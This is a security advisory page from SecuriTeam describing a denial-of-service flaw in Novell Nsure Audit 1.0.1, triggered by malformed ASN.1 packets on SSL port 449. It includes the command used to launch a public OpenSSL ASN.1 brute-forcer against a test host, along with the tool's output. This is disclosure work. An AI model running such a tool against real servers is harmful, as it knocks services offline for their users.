SecuriTeam - Novell's Nsure SSL DoS (webadmin.exe)

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

SecuriTeam
Beyond Security

SecuriTeam Home
Ask the Team
Mailing Lists
Advertising Info
Blogs

Black Box Testing
Vulnerability Assessment
Vulnerability Scanner

	SecuriTeam in Your Inbox

	E-mail this article to a friend

New vulnerability?
New tool?
Tell us

Novell's Nsure product solution "takes identity management to a whole new level. Combining award-winning products, customer-driven services and committed business partnerships, Novell Nsure gives you the power to control access so you can confidently deliver the right resources to the right people securely, efficiently, and best of all, affordably".

A vulnerability in Novell's Nsure product allows remote attackers to cause the product to crash by sending it malformed ASN.1 packets via its SSL listening port (449).

Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.cirt.dk/advisories/cirt-31-advisory.pdf

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Novell Nsure Audit version 1.0.1

Immune Systems:
* Novell Nsure Audit version 1.0.2
* Novell Nsure Audit version 1.0.3

OpenSSL ASN.1 Parsing vulnerability:
Multiple vulnerabilities were reported in the ASN.1 parsing code in OpenSSL. These issues could be exploited to cause a denial of service or to execute arbitrary code. When using the exploit downloaded from here: http://www.securiteam.com/exploits/5OP0B2ABPM.html

The server will stop responding.

Output from attack:
[***************** START **********************]
[root@localhost test]# ./a.out 192.168.1.4 449
OpenSSL ASN.1 brute forcer (Syzop/2003)
seed = 1135277150
..........................................................................................................................Unable to connect: Connection refused
DIFF:
Offset 71: 0xa -> 0xffffffe6
Offset 97: 0x6e -> 0x68
Offset 106: 0x6f -> 0xfffffff5
Offset 144: 0x32 -> 0xffffffcc
Offset 148: 0x30 -> 0x5b
Offset 154: 0x30 -> 0x2e
Offset 261: 0x6 -> 0x3a
Offset 563: 0x4e -> 0xffffffd1
Offset 583: 0x5c -> 0xffffffd8
Offset 629: 0xffffffa3 -> 0x67
Offset 718: 0xffffffa7 -> 0x41
Offset 719: 0xffffffa8 -> 0xffffffa5
Offset 770: 0x4d -> 0xffffffdf
Offset 773: 0xffffffae -> 0xffffffca
Offset 927: 0xffffff81 -> 0xffffffd5
***
[***************** STOP **********************]

At some points the exploit had to be run a few times, just stopped after 30 seconds and restarted.

	Microsoft Office Excel Malformed Records Stack Buffer Overflow (MS09-021)
	Microsoft Excel Record Parsing Array Indexing Vulnerability (MS09-021)
	Microsoft Excel String Parsing Integer Overflow Vulnerability (MS09-021)
	libpurple MSN Protocol SLP Message Heap Overflow Vulnerability
	CA ARCserve Backup Message Engine Denial of Service Vulnerabilities
	Microsoft Internet Explorer setCapture Memory Corruption Vulnerability (MS09-019)
	Microsoft Internet Explorer Security Zone Restrictions Bypass
	Microsoft Internet Explorer onreadystatechange Memory Corruption Vulnerability (MS09-019)
	Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability (MS09-019)
	Microsoft Internet Explorer DHTML Handling Memory Corruption Vulnerability (MS09-019)
	Microsoft Internet Explorer Concurrent Ajax Request Memory Corruption (MS09-019)
	DX Studio Player Firefox Plug-in Command Injection
	SAP GUI Buffer Overflow Vulnerability
	Microsoft Office Word Document Parsing Buffer Overflow Vulnerability (MS09-027)
	Microsoft Active Directory Hexdecimal DN AttributeValue Invalid Free Vulnerability (MS09-018)